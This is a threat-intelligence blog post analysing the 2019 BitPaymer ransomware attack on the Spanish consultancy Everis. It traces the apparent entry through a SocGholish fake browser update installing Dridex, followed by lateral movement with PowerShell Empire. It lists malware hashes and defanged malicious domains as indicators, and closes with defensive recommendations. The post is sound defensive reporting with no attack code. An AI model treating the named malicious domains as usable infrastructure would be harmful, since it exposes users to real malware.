Blog  /  Research & Threat Intel  /  Spanish consultancy Everis suffers BitPaymer ransomware attack: a brief analysis

Spanish consultancy Everis suffers BitPaymer ransomware attack: a brief analysis

Research & Threat Intel 06 Nov 2019
Written By
Jose Miguel Esparza Senior Threat Analyst, Outpost24

Key Points 

  • Everis was infected with BitPaymer (FriedEx/IEncrypt), a targeted ransomware operated by the Dridex Group. Domestic users are not affected by this threat, just businesses 
  • This security incident is unrelated to the attack suffered by Cadena SER (PRISA) 
  • There are no confirmations that any other Spanish companies were targeted in the same attack 
  • According to IOCs, the entry point was a FakeUpdate (SocGholish) installing Dridex (botnet 199) in Everis systems 
  • From the Dridex infection, the attackers moved laterally using PowerShell Empire and finally executed BitPaymer in specific machines

Ransomware Attack Overview 

Due to the lack of official information from Everis different researchers and media started to share different hypotheses concerning this ransomware attack. The ransomware note with a custom message to Everis was leaked in the media as well as some infected files with extension “.3v3r1s” were uploaded to Virus Total.  

As a result of this it was possible to better understand the kind of threat faced by Everis. The ransomware note had exactly the same format as the usual ransomware note used by BitPaymer in its infections, and the custom extension is also typical to BitPaymer infections. In this case, the samples related to Everis was bd327754f879ff15b48fc86c741c4f546b9bbae5c1a5ac4c095df05df696ec4f. 

bitpaymer

One day after the initial incident (5th November 2019), a comment was published on Virus Total by a newly created user sharing IOCs and information related to the Everis incident. This information mentioned a compromised website which was dropping a Javascript file, simultaneously installing Emotet in the victims’ computers. Following this, the attackers apparently used Empire to move laterally and execute BitPaymer. 

everis_case_vt_comment

The usual modus operandi of the attackers behind BitPaymer is to use Dridex as an entry point to later move laterally in the targeted network. Dridex can be installed in systems via Emotet spam or other methods, but seeing Emotet as the entry point for lateral movement was something that we had not observed previously.  

We utilized our sandbox to execute the IOCs shared as Emotet in the Virus Total comment (1d778359ab155cb190b9f2a7086c3bcb4082aa195ff8f754dae2d665fd20aa05 and 628c181e6b9797d8356e43066ae182a45e6c37dbee28d9093df8f0825c342d4c). It transpired that those samples were actually Dridex, belonging to the botnet 199. As this was something expected from the group operating BitPaymer, we assume there was an error in the malware classification but that the IOCs shared might indeed be related to the Everis incident. 

Attack Vector 

Several hypotheses have been proposed regarding the attack vector. As there was a peak of BlueKeep exploitation during the past weekend, some sources pointed to BlueKeep as the source of the attack. 

Alternative hypotheses pointed to a malware spam distribution, possibly using Emotet. The Virus Total comment which was apparently leaking Everis information mentioned a compromised website (esancendoc[.]esan[.]edu[.]pe) and a download link belonging to the subdomain click[.]clickanalytics208[.]com. 

Knowing that Dridex was used in the attack, Blueliv analysts are more inclined to point towards the spam theory rather than BlueKeep, as this is not the normal behavior of the group operating BitPaymer. However, the domain mentioned on Virus Total, click[.]clickanalytics208[.]com, has a long history of maliciousness related to FakeUpdate applications which dropped different malware families in the past, including Chthonic, AZORult, NetSupport RAT and… Dridex!  

The filenames mentioned in the Virus Total comment (Chrome.Update.3f61f4.js and crhome.update.3f61f4.exe) also point in the direction of a FakeUpdate downloaded from the web browser and executed by the user. The group operating this malware distribution network is known as SocGholish and it has been active since several years ago. 

It is not confirmed if the victim reached the SocGholish domain via a watering hole (esancendoc[.]esan[.]edu[.]pe), as described in the Virus Total comment or via other ways like spam distribution. As the different IOCs mentioned in this comment have been quite accurate, the watering hole option is quite plausible and it could indeed be the infection vector for the Everis incident. 

Bitpaymer Ransomware Attribution 

The group behind BitPaymer, known as the Dridex Group or INDRIK SPIDER, also operates Dridex. This is the reason that one of the main infection vectors for BitPaymer is to use existent Dridex infections to infiltrate the network of the targeted organization. Usually, the distribution of Dridex is not highly targeted, but given that it is a large botnet containing various different sub-botnets, those affiliates behind them may choose numerous ways to spread the malware.  

The cybercriminals operating the main botnet check the infected machines in the control panel, searching for large or strategically important organizations in order to execute more advanced attacks against them. 

They usually execute a handle to back-connect to their PowerShell Empire server where they can control operations more effectively. In the past, the group dropped specific malicious code like POS malware or Anunak/Carbanak. Currently, they are using BitPaymer to try to make the most of the intrusions. 

Recommendations 

Our usual recommendations to protect against malware infections and ransomware attacks apply in this case. As we have mentioned, the modus operandi of groups operating targeted ransomware like BitPaymer or Ryuk usually take advantage of existent infections. It is therefore common to see FakeUpdates and malware spam as infection points.  

With this in mind, Blueliv makes the following recommendations: 

  • PROTECT AGAINST MALWARE INFECTIONS: use monitoring and threat intelligence tools to detect existing infections in networks and systems. These are particularly effective against those well-known families, such as Dridex and Trickbot  
  • MONITOR FOR EXPOSED RDP SERVERS: continuously check whether RDP servers are exposed, and ensure that the number of machines exposed externally is limited. It is critical that all of them are regularly patched 
  • ENSURE STRONG BACKUP POLICIES: make sure backups are made and that these are stored outside the network of the company. It should be noted that groups usually try to destroy backups before infecting a company with ransomware, so ideally backups should be outside of the company network and indeed physical facilities 
  • EDUCATION, EDUCATION, EDUCATION: most of those threats start from a malicious email or a fake application downloaded from the Internet. All users within any organization, from the management to the newest intern, must be educated in basic cybersecurity skills. Under no circumstances should the only people in the company who can spot a potential threat be the IT or security team.
Fix-table-blog

 NB: These IOCs have not been confirmed by Everis, but they are likely related to the incident. 

References:

https://www.fireeye.com/blog/threat-research/2019/10/head-fake-tackling-disruptive-ransomware-attacks.html

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

https://malware.dontneedcoffee.com/refs/actors/socgholish/

 This post was authored by Head of Threat Intelligence Jose Miguel Esparza and the Blueliv Labs team

About the Author

Jose Miguel Esparza Senior Threat Analyst, Outpost24